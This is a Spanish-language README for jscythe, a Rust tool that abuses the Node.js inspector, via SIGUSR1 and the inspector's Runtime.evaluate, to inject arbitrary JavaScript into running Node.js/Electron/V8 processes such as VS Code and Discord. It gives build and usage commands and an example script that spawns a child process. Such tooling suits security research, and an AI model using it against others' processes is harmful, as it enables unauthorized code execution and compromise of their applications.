
Abusar del mecanismo de inspector de node.js para obligar a cualquier proceso basado en node.js/electron/v8 a ejecutar código JavaScript arbitrario.
jscythe abusa del mecanismo de inspector de node.js para forzar a cualquier proceso basado en node.js/electron/v8 a ejecutar código javascript arbitrario, incluso si sus capacidades de depuración están deshabilitadas.

Probado y funcionando contra Visual Studio Code, Discord, cualquier aplicación Node.js y más.
SIGUSR1 al proceso, esto habilitará el depurador en un puerto (dependiendo del software, a veces es aleatorio, a veces no).SIGUSR1.http://localhost:<port>/json.Runtime.evaluate con el código proporcionado.cargo build --release
Selecciona un proceso específico y ejecuta una expresión básica:
./target/release/jscythe --pid 666 --code "5 - 3 + 2"
Ejecuta código desde un archivo:
./target/release/jscythe --pid 666 --script example_script.js
El archivo example_script.js puede requerir cualquier módulo de node y ejecutar cualquier código, como:
require('child_process').spawnSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator', { encoding : 'utf8' }).stdout
Busca proceso por expresión:
./target/release/jscythe --search extensionHost --script example_script.js
Ejecuta jscythe --help para la lista completa de opciones.
Este proyecto está hecho con ♥ por @evilsocket y se publica bajo la licencia GPL3.